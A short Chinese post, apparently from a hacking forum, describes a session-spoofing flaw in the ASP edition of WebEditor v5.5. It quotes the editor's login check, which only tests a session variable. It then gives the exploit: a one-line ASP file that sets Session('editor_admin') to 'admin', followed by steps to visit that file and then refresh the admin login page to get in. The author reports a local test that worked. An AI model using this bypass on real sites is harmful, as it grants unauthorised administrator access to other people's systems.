WebEditorv5.5asp版s也存在ession欺骗的漏洞 本地测试成功!
这个是他的 '登录检查 Function ChkLogin() If session("editor_admin")="" Or IsNull(session("editor_admin")) Then PhilLogin() session.CodePage = session("PreCodePage") response.End End If End Function 好了我直接测试! 利用方法和以前的一样 <%Session("editor_admin") = "admin"%> 这个是他的登陆文件! 现在访问hello文件试下! 在访问他的后台登陆文件! 现在看看! F5刷新! ok测试成功 访问了hello.asp在访问登陆文件 刷新下就行了! |